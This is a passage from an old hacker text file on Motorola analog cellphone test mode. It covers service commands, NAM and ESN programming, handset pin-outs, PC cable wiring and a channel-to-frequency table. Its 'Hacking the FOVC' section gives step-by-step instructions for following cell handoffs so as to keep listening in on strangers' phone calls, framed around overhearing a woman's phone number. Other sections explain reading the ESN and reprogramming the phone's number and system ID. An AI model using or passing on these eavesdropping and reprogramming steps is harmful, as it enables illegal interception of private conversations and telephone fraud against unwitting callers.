3 697 Hz + 1477 Hz 16 1336 Hz
4 770 Hz + 1209 Hz 17 1477 Hz
5 770 Hz + 1336 Hz 18 1633 Hz (not used in cellular)
6 770 Hz + 1477 Hz 19 Turn DTMF off
7 852 Hz + 1209 Hz 20 2087 Hz
8 852 Hz + 1336 Hz 21 2308 Hz
9 852 Hz + 1477 Hz 22 2553 Hz (not used in cellular)
* 941 Hz + 1209 Hz 23 Turn DTMF off
0 941 Hz + 1336 Hz 24 3428 Hz (not used in cellular)
# 941 Hz + 1477 Hz 25 3636 Hz (not used in cellular)
10 697 Hz 26 4000 Hz (not used in cellular)
11 770 Hz 27 3555 Hz (not used in cellular)
12 852 Hz 28 4571 Hz (not used in cellular)
13 941 Hz 29 Turn DTMF off
Someone Please Check Out 24 thru 28 for accuracy. I had weak equipment.
34# Turn DTMF Off
35# Display RSSI ("D" Series Portable Only)
or
35x# Set Audio Path to x x=0, V.S.P Microphone (Applies to mobiles only.)
x=1, Speaker
x=2, Alert
x=3, Handset
x=4, Mute
x=5, External Telephone (Applies to Portables Only)
x=6, External Handset (Applies to NEWER Portables)
36nnn# Scan (TDMA Telephones only. Scans the primary control channels and
attempts to decipher the forward data stream. The display will show PASS1
if the strongest control channel was accessed, PASS2 if the second
strongest was accessed, and FAIL if no control channel could be accessed.)
(nnn=Scan speed in milliseconds). Tunes from channel 1 to 666 in order.
Entering a * pauses the scan and displays current Channel Number and
RSSI reading (AAA=Channel Number and BBB=RSSI Reading). When scan speed
is 300 milliseconds or greater, the current status is displayed during the
scan; when less than 300 milliseconds the status is displayed only during
pause. Entering * during a pause causes the scan to resume. Entering #
aborts the scan and leaves the mobile tuned to the current channel. During
this command only the * and # keys are recognized.
37# Sets Low Battery Threshold. Usage: #37#x# where x is any number
from 1 to 255. If set to 1, the Low Battery indicator will come up
when the phone is powered on. If set to 255, it may never come up.
38# Display ESN (Displays ESN in four steps, two hexadecimal digits at a time
in a for digit display. The decimal shows the address, 00 through 03 as
the first two digits, and two digits of the ESN as the last two digits.
Use the 'G' to step through the entire hexadecimal ESN.)
Compander OFF ("D" Series Portables)
or
38# SND-SNM. Display shows AA BB. Where AA=Address;BB=Data. Send the SNM
to the display. All 32 bytes of the SNM will be displayed, one byte at
a time. The byte address will be displayed in the upper right-hand
corner and the contents of that address will be displayed in the hex.
The * key is used to step through the address similar to the SEND-NAM
(18#) command.
39# Compander ON ("D" Series Portables)
or
39# RCVSU. Receive one control channel word. When the word is received it
is displayed in hex. This command will be complete when a control channel
word is received or when the # key is entered to abort the command.
40# RCVVC. Receive one voice channel word. When the word is received it is
displayed in hex. This command will be complete when a voice channel
word is received or when the # key is entered to abort the command.
41# Enables Diversity (On F19CTA... Series only.)
42# Disables Diversity (On F19CTA... Series only.)
43# Disable Diversity
USE T/R ANTENNA (On F19CTA... Series only.)
USE R ANTENNA (On D.M.T./ Mini TAC)
44# Disable Diversity
USE R ANTENNA (On F19CTA... Series only.)
USE T/R ANTENNA (On D.M.T./ Mini TAC)
45# Display Current Receive Signal Strength Indicator (Dislpayed as a 3 digit
decimal number) The strongest signal I have ever received was 179 and I
was sitting directly below the tower WITHOUT an external antenna.
46# Display Cumulative Call Timer
47x# Set RX Audio level to X
(For F19CTA ...Series Tranceivers)
X=0, Lowest Volume
X=6, Highest Volume
X=7, mute
Normal setting is 4.
(For D.M.T./ Mini TAC Tranceivers)
X=0, Lowest Volume
X=7, Highest Volume
Normal setting is 4.
(For TDMA Tranceivers and F09F... Series and Higher Portables)
X=0, Lowest Volume
X=15, Highest Volume
Normal setting is 2 to 4. (On TDMA
Tranceivers and Micro TAC portables,
settings 8 through 15 are for DTMF
applications only.)
48# Side Tone On. Use this command in conjunction with 350# to test the
entire audio path in hands-free applications.
49# Side Tone Off
50# Maintenance data is transmitted and test results displayed:
PASS=received data is correct
FAIL 1=2second timeout, no data rec.
FAIL 2=received data is incorrect
51# Test of mobile where maintenance data is transmitted and looped back.
Display is as follows:
PASS=looped-back data is correct
FAIL 1=2 second timeout, no looped-back data
FAIL 2=looped-back data is incorrect
52x# SAT Phase Adjustment. A decimal value that corresponds to phase shift
compensation in 4.5 degree increments. Compensation added to inherent
phase shift in tranceiver to achieve a total of 0 degrees phase shift.
Do NOT enter any values except those shown below.
0 degrees = 0 121.5 degrees = 59 243.0 degrees = 86
4.5 = 1 126.0 = 60 247.5 = 87
9.0 = 2 130.5 = 61 252.0 = 112
13.5 = 3 135.0 = 62 256.5 = 113
18.0 = 4 139.5 = 63 261.0 = 114
22.5 = 5 144.0 = 40 265.5 = 115
27.0 = 6 148.5 = 41 270.0 = 116
31.5 = 7 153.0 = 42 274.5 = 117
36.0 = 16 157.5 = 43 279.0 = 118
40.5 = 17 162.0 = 44 283.5 = 119
45.0 = 18 166.5 = 45 288.0 = 120
49.5 = 19 171.0 = 46 292.5 = 121
54.0 = 20 175.5 = 47 297.0 = 122
58.5 = 21 180.0 = 64 301.5 = 123
63.0 = 22 184.5 = 65 306.0 = 124
67.5 = 23 189.0 = 66 310.5 = 125
72.0 = 48 193.5 = 67 315.0 = 126
76.5 = 49 198.0 = 68 319.5 = 127
81.0 = 50 202.5 = 69 324.0 = 104
85.5 = 51 207.0 = 70 328.5 = 105
90.0 = 52 211.5 = 71 333.0 = 106
94.5 = 53 216.0 = 80 337.5 = 107
99.0 = 54 220.5 = 81 342.0 = 108
103.5 = 55 225.0 = 82 346.5 = 109
108.0 = 56 229.5 = 83 351.0 = 110
112.5 = 57 234.0 = 84 355.5 = 111
117.0 = 58 238.5 = 85 360.0 = 70
53# Enable scrambler option, when equipped.
54# Disable scrambler option, when equipped.
55# Display/Program N.A.M. (Test Mode Programming)
TEST MODE PROGRAMING:
The following steps are for software version 9308 and older. If you have
a newer phone they will most likely be different. The newer phones with
Caller ID are for sure. SEND ME THE NEW PROGRAMMING STEPS SO I CAN UPDATE
THESE!!! I don't want to hear that they were wrong unless there are
corrected steps following!!!
Assuming you have completed one of the above steps correctly the phone
will wake up in test mode when you turn the power on. When you first
access test mode the phone's display will alternate between various status
information that includes the received signal strength and channel number.
The phone will operate normally in this mode. You can now access Service
Mode by pressing the # key, the display will clear and a ' will appear.
Use the following procedure to program the phone:
1. Enter 55# to access programing mode.
2. The * key advances to the next step. (NOTE that test mode programing
does NOT have step numbers, each time you press the * key the phone
will display the next data entry).
3. The CLR key will revert the display to the previously stored data.
4. The # key aborts programing at any time.
5. To complete programing you must scroll through ALL entries until a '
appears in the display.
6. Note that some entries contain more digits than can be displayed by the
phone, in this case only the last part of the data can be seen.
TEST MODE PROGRAMING DATA: For AMPS and NAMPS Cellular Telephones
STEP# #OF DIGITS/RANGE DESCRIPTION
01 00000 - 32767 SYSTEM ID
02 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 1 BELOW
03 10 DIGITS MIN (AREA CODE & TEL#)
04 2 DIGITS STATION CLASS MARK, SEE NOTE 2 BELOW
05 2 DIGITS ACCESS OVERLOAD CLASS
06 2 DIGITS GROUP ID (10 IN USA)
07 6 DIGITS SECURITY CODE
08 3 DIGITS LOCK CODE
09 3 DIGITS SERVICE LEVEL, SEE NOTE 3 BELOW
10 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 4 BELOW
11 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 5 BELOW
12 0333 OR 0334 INITIAL PAGING CHANNEL
13 0333 "A" SYSTEM IPCH
14 0334 "B" SYSTEM IPCH
15 3 DIGIT NUMBER PAGING CHANNEL (021 IN USA)
16 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 6 BELOW
Steps 01 through 06 and 12 will repeat for NAM 2 if the second phone
number bit has been enabled in step 11.
TEST MODE PROGRAMING DATA: For TDMA Cellular Telephones
STEP# #OF DIGITS/RANGE DESCRIPTION
01 00000 - 32767 SYSTEM ID
02 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 1 BELOW
03 10 DIGITS MIN (AREA CODE & TEL#)
04 2 DIGITS STATION CLASS MARK, SEE NOTE 2 BELOW
05 2 DIGITS ACCESS OVERLOAD CLASS
06 2 DIGITS GROUP ID (10 IN USA)
07 6 DIGITS SECURITY CODE
08 3 DIGITS LOCK CODE
09 3 DIGITS SERVICE LEVEL, SEE NOTE 3 BELOW
10 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 4 BELOW
11 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 5 BELOW
12 0333 OR 0334 INITIAL PAGING CHANNEL
13 0333 "A" SYSTEM IPCH
14 0334 "B" SYSTEM IPCH
15 3 DIGITS DEDICATED PAGING CHANNELS (021 IN USA)
16 3 DIGITS SECONDARY INITIAL PAGING CHANNEL. 708 for
system A, 737 for system B. Allows the TDMA
telephone to be assigned to a TDMA channel in
a call
17 708 SECONDARY INITIAL PAGING CHANNEL FOR SYSTEM A
18 737 SECONDARY INITIAL PAGING CHANNEL FOR SYSTEM B
19 8 DIGITS OPTION PROGRAMMING, SEE NOTE 6 BELOW
NOTES:
Take care with Motorola's use of "0" and "1". Some options use "0" to
enable, some use "1".
These are eight digit binary fields used to select the following options:
1. (step 02 above, suggested entry is: 11101001 for "A" system, 10101001
for "B" sys)
Digit 1: Local use mark, 0 or 1.
Digit 2: Preferred system, 1=system A, 0=system B.
Digit 3: End to end (DTMF) dialing, 1 to enable.
Digit 4: Not used, enter 0. Formerly used for test mobile.
Digit 5: Repertory (speed) dialing, 1 to enable. (Not used in TDMA)
Digit 6: Auxiliary (horn) alert, 1 to enable.
Digit 7: Hands free (VSP) auto mute, 1 to enable (mutes outgoing hands
free audio until the MUTE key is pressed). (Not used in TDMA)
Digit 8: Min mark, 1. NOT CHANGEABLE.
2. Station Class Mark
SCM | 666 or 832 Ch. | VOX | Max Power
-----+----------------+-----+-----------
00 | 666 | N | 3.0 W
01 | 666 | N | 1.2 W
02 | 666 | N | 0.6 W
03 | | |
04 | 666 | Y | 3.0 W
05 | 666 | Y | 1.2 W
06 | 666 | Y | 0.6 W
07 | | |
08 | 832 | N | 3.0 W
09 | 832 | N | 1.2 W
10 | 832 | N | 0.6 W
11 | | |
12 | 832 | Y | 3.0 W
13 | 832 | Y | 1.2 W
14 | 832 | Y | 0.6 W
15 | | |
3. Service Level Codes:
001 The telephone will only dial numbers in memory locations 01, 02
and 03. No keypad entries or memory storage is possible.
Restrict ALL outgoing calls by clearing locations 01, 02, and 03
and place the phone in servicing level 001. In some phones this
applies to memory locations 01 - 10.
002 The telephone will dial only numbers from memory locations. The
keypad is disabled and super speed dialing is not enabled.
003 Keypad dial only; no memory recall allowed.
004 Unlimited keypad and memory dialing. (DEFAULT)
005 Seven-digit dialing only
006 Full keypad and memory dialing, but memory locations 1 through
10 cannot be changed.
007 The phone will dial only from as many as 50 programmable memory
locations
4. (step 10 above, suggested entry is: 00000100)
Digits 1 - 3: Not used in USA, enter 0.
Digit 4: Extended Field. When enabled, the telephone will scan
more than 32 paging channels. Not used in USA, 0 to disable
Digit 5: Single system scan, 1 to enable (scan A or B system only,
determined by bit 2 of step 02. Set to "0" to allow user the
option).
Digit 6: Super speed dial, 1 to enable (pressing N, or NN SND will
dial the number stored in memory location NN).
Digit 7: User selectable service level, 0 to enable (allows user to
set long distance/memory access dialing restrictions).
Digit 8: Lock function, 0 to enable (allows user to lock/un-lock the
phone, if this is set to 1 the phone can not be locked).
5. (step 11 above, suggested entry is: 00000000)
Digit 1: Handset programing, 0 to enable (allows access to programing
mode without having to enter test mode).
Digit 2: Second phone number (not all phones), 1 to enable.
Digit 3: Call timer access, 0 to enable. (Not used in TDMA)
Digit 4: Auto system busy redial, 0 to enable.
Digit 5: Internal Speaker disable, 1 to enable (use with select VSP
units only, do not use with 2000 series mobiles).
Digit 6: IMTS/Cellular, 1 to enable (rarely used).
Digit 7: User selectable system registration, 0 to enable.
Digit 8: Dual antenna (diversity), 1 to enable.
6. (step 16 and 19 above, suggested entry is: 0011010 for portable and 0011011
for mobile units)
Digit 1: Enhanced Scan, when enabled, four strongest signalling
channels are scanned insted of two. 1=enabled, 0-disabled.
Digit 2: Cellular Connection, used only in series II phones if a
series I cellular connection is used with a series II.
0=series II, 1=series I, 0 for ALL TDMA PHONES
Digit 3: Continuous DTMF, 1 to enable (software version 8735 and later)
Digit 4: Transportable Internal Ringer/Speaker. When set to 0, audio
is routed to the external speaker of the transportable; 1
routes it to the handset.
Digit 5: 8 hour time-out, 0 to enable (software version 8735 and later)
Digit 6: Not used, 0 only.
Digit 7: Failed page indicator, 0 to enable (phone beeps when an
incoming call is detected but signal conditions prevent
completion of the call).
Digit 8: Portable scan, 0 for portable, 1 for mobile units.
56# Illumination Diagnostic. Lights up all lights (except the green in use
light) and displays all "8"'s. The phone is also muted until repowered.
57x# Call Processing Mode
x=0, AMPS
x=1, NAMPS
x=2-4, RESERVED
x=5, TDMA signalling
x=6, TDMA signalling with loopback before decoding
x=7, TDMA signalling with loopback voice after decoding
x=8, TDMA signalling with loopback FACCH after decoding
x=9, TDMA forced synchronization
58# Compander On (Audio compressor and expander) (See 39#)
59# Compander Off (Audio compressor and expander) (See 38#)
60# no function
61# ESN Transfer (For Series I D.M.T./Mini TAC only)
62# Turn On Ringer Audio Path
63# Turn Off Ringer Audio Path
64# ? Does something, doesn't display anything
65# ? Does something, doesn't display anything
66# Identity Transfer (Series II Trancvrs and some Current Shipping Portables)
67# Displays two 3 digit numbers. If you keep entering this command
repeatedly, the first number will constantly change, the second won't
(as far as I have seen).
68# Diaplay FLEX and Model Information
69# Used with Identity Transfer
70# Abbreviated field transmitter audio deviation command, for tranceivers
with FCC ID ABZ89FT5668.
71# Abbreviated field power adjustment command, for tranceivers with FCC ID
ABZ89FT5668.
72# Field audio phasing commands. The left side of the display should read
"00" followed by a two digit number. The "00" indicates the first
programming step. If you press the *, the 00 changes to 01 and so on until
08. The "06" and "0A" are used to change the audio level (to change:
press the volume up or down keys). Other registers...don't know.
73# Field power adjustment command.
74#-99# no function
NOTES: As new fones come out, more commands are added/deleted as needed.
The majority of these commands were figured using VERY old software
versions. Some commands won't work on some phones. If you find a
command that does something, please inform me as well as the software
version number of the phone it was discovered on.
----------------------------------------------------------------- ---------------
* NEW SECTION *
COMMANDS THAT DO SOMETHING BUT I DON'T KNOW WHAT!!!
74#
75#
76#
77#
78#
80#
99#
If you have any insight to these commands or if you have any more to add to the
list, please email me promptly. Thank you.
H*A*C*K*I*N*G***T*H*E***F*O*V*C********************************S* E*C*T*I*O*N***5
Note: This is NOT my hack. Thanks to Patrk@delphi.com for this addition.
HACKING THE FOVC
Problem: When listening to something interesting (a conversation),
just when that sexy sounding horny broad begins to give her
phone number to some lucky guy, HANDOFF!!! then static... DAMN!
Trick: Hack the FOVC.
a quick definition: FOVC = FOward Voice Channel
FOCC = FOward Control Channel
REVC = REverse Voice Channel
RECC = REverse Control Channel
As the phone travels through cells, the FOVC is where the tower tells
the phone to adjust power levels for the current cell or to change to
a new channel for use in the new cell. This info can be hacked apart.
So. When you've found a good conversation, don't be lazy! Enter 40#!
This makes the phone listen for commands on the voice channel
(embedded in the audio portion- you can hear it as a "bump" sound). It
will just sit there and the display will read '40' , but the
conversation will still be audible. Now when the phone receives a
FOVC command (a 40 bit sequence) data will flow across the display, in
hex format, and stop. Listen to the phone, if the conversation is
still there, then the command was only to adjust power levels. If the
conversation is gone, then its a handoff. If you only got a power
adjustment command just press # or clr, which ever gets you back to
the ' prompt. Enter 40# and keep listening. You can also use the # key
to cancel the 40# command, if you want to change channels or something.
If it was a handoff, its time for some quick math. You have to convert
some of the numbers to binary, and then to decimal. I don't know how
many characters your phone's display will show. Mine only shows the
last seven of the ten hex digits. Count left from the end 6 digits.
Write down that digit and the next two on a piece of paper, ie:
???j16djjj j=junk numbers (hex numbers range from 0-9,a-f)
/ \
these are lost due to scrolling
write down 16d then convert it to a binary string:
1 = 0001
6 = 0110
d = 1101 (d=13)
now you have a binary string like this: 000101101101
throw away the first 2 bits and get: 0101101101
convert this to decimal and get: 365
365 is the new channel the conversation has moved to! Enter 110365#
and voila! You too, can hear the horny babe's phone number!
Don't forget to enter 40# again, as the call may be moving quickly
through cells ( small cells or freeway driving ) or the call can get
bounced around by the tower for cell traffic purposes.
Here's one more example of the hex>binary>decimal conversion.
???j5aejjj
5 = 0101
a = 1010
e = 1110
full string = 010110101110
truncate 2 msb = 0110101110
convert to decimal = 430
R*E*A*D*I*N*G***T*H*E***S*I*D**********************************S* E*C*T*I*O*N***6
READING THE SID by Doctor Who
The SID (System IDentification) of a control channel can be determined using
the test mode of the Motorola cellular phone. This document assumes the
reader understands celllular technology in general, and how to access
Motorola's test mode in specific.
Tune the phone to the desired control channel with 11xxxx# where xxxx is the
channel number. Hit 39# to receive one control channel word. One shoulld
appear in less than two seconds, filling up all ten digits on the display with
hexadecimal digits. Do this repeatedly until one is found with the correct
pattern. Digit places start at the left hand side and go to the right.
The first digit should be C,D,E, or F. This letter can be used to determine
the DCC/SAT of the cell. A "C" is SAT 0, D is 1, E is 2, and F is 3. Ignore
digits 8,9, and 10. They are parity bytes. Digit 7 should be "6" or "E",
though I have never found it to be other than "E". The hexadecimal value of
represented by digits 2 through 5 is then divided by two, and then 1 added if
the carrier as an "A" side, "non-wireline" carrier. The result is the system
ID.
for example:
E00388EA08
E means this cell has an SAT/DCC of 3. The A08 is ignored. The E to the left
of it is proper and normal, so this is the right kind of message. Ignore the
8 in position 6, that is just to the left E. 0038 in hexadecimal translates
((3*16=48)+8) to 56. 56/2=28. Looking up System ID 28 on my chart indicates
Nynex in Boston. This is correct.
Please be aware that the two SID charts I have seen around the net are very
outdated. I have a more recent version on paper which I may eventually type
in, when I have the time and energy.
The methods used above are only a very crude way to do what could be done much
more efficiently by computer. I am sure that programs will be written to do
exactly this, but I am holding off until I have thoroughly hacked the meaning
of all these types of message before writing such a program. I am also
contemplating the design of a cable to replace the handset, running from the
25 pin connector on the side of my bag phone to a computer.
---------=?> Doctor Who <?=--------
P*H*O*N*E***P*I*N*-*O*U*T*S************************************S* E*C*T*I*O*N***7
Before going into the cable specs, here are the pin-outs to all phones as of
now (in the US). A very special thanks go to Motorola for faxing me the new
Ultra Classic II pin-outs!
Pinouts for the Motorola 8000 brick phone - "N" series
numbering starts on top left 1 2 3 * 4 5 6
7 8 9 * 10 11 12
PIN SIGNAL
* GROUND
1 logic ground
2 not used
3 audio in to phone
4 audio out (and on/off toggle)
5 4.75 Bias
6 Manual test line
7 Ground for audio signals (common)
8 TRU data line
9 not used
10 CMP data line
11 RTN data line
12 ignition sense
----------------------------------------------------------------- ---------------
CVC BLOCK
[ 1] [ 2] [ 3] [ 4] [ 5] [ 6]
[ 7] [ 8] [ 9] [10] [11] [12]
1 VSP Enable 7 GROUND
2 SPKR Enable 8 S TRU
3 TX HI on/off 9 AUX Alert
4 RX HI 10 S CMP
5 RX HI OPT 11 S RTN
6 MAN TEST 12 IGN
----------------------------------------------------------------- ---------------
25 pin cable pinouts (series 2 and 3 tranceivers)
PIN DESIGNATION/FUNCTION
1 Transmit Audio/ON - OFF Function
2 Mobile/Transportable Select Line
3 Ground (A + return), one of 2 black wires. Both are required for proper
operation
4 Battery A +, one of 2 red wires. Both are required for proper operation.
5 Ignition Sense Lead, green with red tracer
6 Receiver audio to handset (RX High), pin 8 on the handset connector
7 Ground
8 Regulated +9.5 volts to handset, pin 2 on handset connector
9 Ground
10 Auxiliary Alert, yellow with black tracer, used to blow the horn or
flash the headlights. Provides a ground function. NOTE: 1/2 amps
maximum current. The recommended method is to drive a relay
(e.g. MOT 59K813674). Ignition Sense, pin 5, must be low for this
function to work.
11 T-Data, one of the 3-wire bus lines, to pin 3 of the handset connector
12 C-Data, one of the 3-wire bus lines, to pin 4 of the handset connector
13 Ground
14 Transmit Audio Shield
15 Transmit Audio
16 Battery A+, one of two red wires. Both are required for proper operation
17 Ground, one of two black wires. Both are required for proper operation
18 R-Data, one of the 3-wire bus lines, to pin 5 of the handset connector
19 Receiver audio to external speaker
20 Ground for receiver audio (shield) to external speaker
21 Manual test line. When connected to ground, puts phone in test mode
22 Ground
23 Handset logic ground, to handset connector pin 1
24 Handset audio ground, to handset connector pin 6
25 Accessory ground, to external speaker
----------------------------------------------------------------- ---------------
Flip Fones and all fones using the dpc/pt flip cable
J3 Pin Function
1 2 3 4 5 6 7 8 + G - 1 Logic Ground
| | | | | | | | | | | 2 Ext. 7.5V
3 TRU
4 CMP
(looking at back of phone with battery removed) 5 RTN
6 Audio Ground
7 RX Audio OUT (spkr)
8 TX Audio IN (mic)
----------------------------------------------------------------- ---------------
New External Connector for the Ultra Classic II CVC Pinblocks
\
\
\
\
[] [] \ Pin Designation/Function
\ \
+-------------------------+ 1 Regulated 8 volts
| 12 10 8 6 4 2 | 3 ext. switched A+ enable
| - - - - - - | 5 ext. spkr/mic enable
| O | 7 TX hi - on/off
| - - - - - - | 9 T Data
\ | 11 9 7 5 3 1 | 11 R Data
+-------------------------+
| 2 Audio Ground
PHONE / 4 manual test
6 ignition / charger B+
8 RX hi
10 C Data
12 logic ground
C*A*B*L*E***S*P*E*C*S******************************************S* E*C*T*I*O*N***8
OK OK OK. Here are the cable specs. They are 100% correct. Of course I
wouldn't know because these are for information purposes only. I have been
told however by VERY reliable sources that they are guarenteed, 100%, GRADE-A,
correct. If they don't work for you, you did something wrong.
Cable Instructions for the bag phones (thanks Jakey)
phone (female 25 pin) computer (male 25 pin) (parallel port)
18 ----------------------- 1
21 ----------------------- 2
1 ------------------------ 4 Below are 10K ohm resistors
12 ----------------------- 12 ----/\/\/----.
11 ----------------------- 13 ----/\/\/----+
4,5,8 -------------------------------------'
2,3,17,20----------------- 18 --- Ground/black wire (-12 Volts)
16 ------------------------------ Positive/yellow wire (+12 volts)
By the way, Jakey told me to remind you that the handset can NOT be plugged in
while this cable is hooked up.
----------------------------------------------------------------- ---------------
Motorola Cellphone cable construction for flips
-------------------------------------
DB25 FLIP Battery Eliminator cable
---- ---- attatchment pins up:
1(--------)4
--------=
2(--|<----)Jump this line to the Center 1 =
Pin on the back of phone. --------=
=
4(--|<----)1 "|<" is the IN4001 diode. --------=
=
12(--------)5 --------=
4 = -->To phone
13(--------)6 --------=
5 =
18-25(-+------)8 --------=
| 6 =
| +-)7 --------=
| | 7* =
| | --------=
| | 8* =
NeG PoS ---Cig adapter --------=
DB25 Male Phone Power Connector
(see Note 1)
1-To phone pin 4 1-DB25 pin 4(see note 2) Gnd-To Db25 Pins 18-25 and
2-To Phone test lead 2-NC Phone pin 8
(see note 2)
3-NC 3-NC Tip-To phone pin 7
4-To phone pin 1 4-To DB25 pin 1
(see note 2)
5-NC 5-To DB25 pin 12
6-NC 6-To DB25 pin 13
7-NC 7-To tip on power connector
8-NC 8-GND
9-NC Test Lead-To DB25 pin 2 (See note 2)
10-NC
11-NC
12-To Phone pin 5
13-To Phone pin 6
14-NC
15-NC
16-NC
17-NC
18-GND \
19-GND |
20-GND |
21-GND |--Conn together to GND on 12v conn
22-GND | And pin 8 on phone plug
23-GND |
24-GND |
25-GND /
NOTE 1:
The power adapter on the cable is 12 volt input but is a regulated
7.95 volts out. DO NOT connect 12 volts between pins 7 and 8 on the
phone connector.
NOTE 2:
| /|
DB25 Pin 4-----| < |------Phone pin 1
| \|
| /|
DB25 Pin 2-----| < |------Phone test lead
| \|
----------------------------------------------------------------- ---------------
Motorol Transcievers
_____________________
4500x,4800x,6800x,Etc.
______________________
Female 25 Pin Male 25 Pin
D-Connector D-connector
To transciever To P.C.Parallel Port
Pin Pin
1._____________________________________ 4.
2._____________________________________ 18.
___10k______ 13.
/
______4+5._______________________/____10K______ 12.
| 12.____________________________________/
| 11._____________________________________ 13.
| 18._____________________________________ 1.
| 21._____________________________________ 2.
| ___14+17+20+23.____________________________ 18.
| |
| |___ -ve
|
|________ +ve 9 Volt
Motorola 8500x 8800x(early type)
________________________________
25 Pin D-plug(P.C.lpt1) Phone Back(battery removed)
Pin Diode,s [] [] [] [] [] []
3.--orange-|<1n4001---------------------/ / /
4.--blue---|<1n4001----------------------------/ /
2.--red----|<1n4001---------------------------------------/
19.-------------\
20.-----------\ | [] [] [] [] [] []
18.--black----+-+------------/ / / /
13.--yellow-----------------------/ / /
12.--brown------------------------------------/ /
1.--grey-------------------------------------------/
[] []
-8 to -12V. +8 to =12V.
NOTE Diode protocol: Kathode---|<diode---Anode
C*H*A*N*N*E*L***N*U*M*B**E*R***V*S*.***F*R*E*Q*U*E*N*C*Y*******S* E*C*T*I*O*N***9
The follwing text I took from the Poisoned Pen BBS (Hi guys). Thanks Jakey
for taking the time to decipher all of this shit. As far as I know, with
the exception of a post on #cellular and the upload to Poisoned Pen, there is
nothing in print with this compilation. Again, special thanks go to Jakey
(jbs@mcs.net) for the long, seemingly endless work.
CELLULAR PHONE FREQUENCIES AND MOTOROLA
TEST MODE NUMERIC CODES.
( Motorola test mode channel numbers )
( are for use in motorola test mode )
( with function 11xxxx# )
( All frequencies in Megahertz FM )
Lower Set (1-666)
Tower Freq. Mobile Freq. 11xxxx# Channel
Tx 870.03 Rx 825.03 Chan 0001 #1
Tx 870.06 Rx 825.06 Chan 0002 #2
Tx 870.09 Rx 825.09 Chan 0003 #3
Tx 870.12 Rx 825.12 Chan 0004 #4
Tx 870.15 Rx 825.15 Chan 0005 #5
Tx 870.18 Rx 825.18 Chan 0006 #6
Tx 870.21 Rx 825.21 Chan 0007 #7
Tx 870.24 Rx 825.24 Chan 0008 #8
Tx 870.27 Rx 825.27 Chan 0009 #9
Tx 870.30 Rx 825.30 Chan 0010 #10
Tx 870.33 Rx 825.33 Chan 0011 #11
Tx 870.36 Rx 825.36 Chan 0012 #12
Tx 870.39 Rx 825.39 Chan 0013 #13
Tx 870.42 Rx 825.42 Chan 0014 #14
Tx 870.45 Rx 825.45 Chan 0015 #15
Tx 870.48 Rx 825.48 Chan 0016 #16
Tx 870.51 Rx 825.51 Chan 0017 #17
Tx 870.54 Rx 825.54 Chan 0018 #18
Tx 870.57 Rx 825.57 Chan 0019 #19
Tx 870.60 Rx 825.60 Chan 0020 #20
Tx 870.63 Rx 825.63 Chan 0021 #21
Tx 870.66 Rx 825.66 Chan 0022 #22
Tx 870.69 Rx 825.69 Chan 0023 #23
Tx 870.72 Rx 825.72 Chan 0024 #24
Tx 870.75 Rx 825.75 Chan 0025 #25
Tx 870.78 Rx 825.78 Chan 0026 #26
Tx 870.81 Rx 825.81 Chan 0027 #27
Tx 870.84 Rx 825.84 Chan 0028 #28
Tx 870.87 Rx 825.87 Chan 0029 #29
Tx 870.90 Rx 825.90 Chan 0030 #30
Tx 870.93 Rx 825.93 Chan 0031 #31
Tx 870.96 Rx 825.96 Chan 0032 #32
Tx 870.99 Rx 825.99 Chan 0033 #33
Tx 871.02 Rx 826.02 Chan 0034 #34
Tx 871.05 Rx 826.05 Chan 0035 #35
Tx 871.08 Rx 826.08 Chan 0036 #36
Tx 871.11 Rx 826.11 Chan 0037 #37
Tx 871.14 Rx 826.14 Chan 0038 #38
Tx 871.17 Rx 826.17 Chan 0039 #39
Tx 871.20 Rx 826.20 Chan 0040 #40
Tx 871.23 Rx 826.23 Chan 0041 #41
Tx 871.26 Rx 826.26 Chan 0042 #42
Tx 871.29 Rx 826.29 Chan 0043 #43
Tx 871.32 Rx 826.32 Chan 0044 #44
Tx 871.35 Rx 826.35 Chan 0045 #45
Tx 871.38 Rx 826.38 Chan 0046 #46
Tx 871.41 Rx 826.41 Chan 0047 #47
Tx 871.44 Rx 826.44 Chan 0048 #48
Tx 871.47 Rx 826.47 Chan 0049 #49
Tx 871.50 Rx 826.50 Chan 0050 #50
Tx 871.53 Rx 826.53 Chan 0051 #51
Tx 871.56 Rx 826.56 Chan 0052 #52
Tx 871.59 Rx 826.59 Chan 0053 #53
Tx 871.62 Rx 826.62 Chan 0054 #54
Tx 871.65 Rx 826.65 Chan 0055 #55
Tx 871.68 Rx 826.68 Chan 0056 #56
Tx 871.71 Rx 826.71 Chan 0057 #57
Tx 871.74 Rx 826.74 Chan 0058 #58
Tx 871.77 Rx 826.77 Chan 0059 #59
Tx 871.80 Rx 826.80 Chan 0060 #60
Tx 871.83 Rx 826.83 Chan 0061 #61
Tx 871.86 Rx 826.86 Chan 0062 #62
Tx 871.89 Rx 826.89 Chan 0063 #63
Tx 871.92 Rx 826.92 Chan 0064 #64
Tx 871.95 Rx 826.95 Chan 0065 #65
Tx 871.98 Rx 826.98 Chan 0066 #66
Tx 872.01 Rx 827.01 Chan 0067 #67
Tx 872.04 Rx 827.04 Chan 0068 #68
Tx 872.07 Rx 827.07 Chan 0069 #69
Tx 872.10 Rx 827.10 Chan 0070 #70
Tx 872.13 Rx 827.13 Chan 0071 #71
Tx 872.16 Rx 827.16 Chan 0072 #72
Tx 872.19 Rx 827.19 Chan 0073 #73
Tx 872.22 Rx 827.22 Chan 0074 #74
Tx 872.25 Rx 827.25 Chan 0075 #75
Tx 872.28 Rx 827.28 Chan 0076 #76
Tx 872.31 Rx 827.31 Chan 0077 #77
Tx 872.34 Rx 827.34 Chan 0078 #78
Tx 872.37 Rx 827.37 Chan 0079 #79
Tx 872.40 Rx 827.40 Chan 0080 #80
Tx 872.43 Rx 827.43 Chan 0081 #81
Tx 872.46 Rx 827.46 Chan 0082 #82
Tx 872.49 Rx 827.49 Chan 0083 #83
Tx 872.52 Rx 827.52 Chan 0084 #84
Tx 872.55 Rx 827.55 Chan 0085 #85
Tx 872.58 Rx 827.58 Chan 0086 #86
Tx 872.61 Rx 827.61 Chan 0087 #87
Tx 872.64 Rx 827.64 Chan 0088 #88
Tx 872.67 Rx 827.67 Chan 0089 #89
Tx 872.70 Rx 827.70 Chan 0090 #90
Tx 872.73 Rx 827.73 Chan 0091 #91
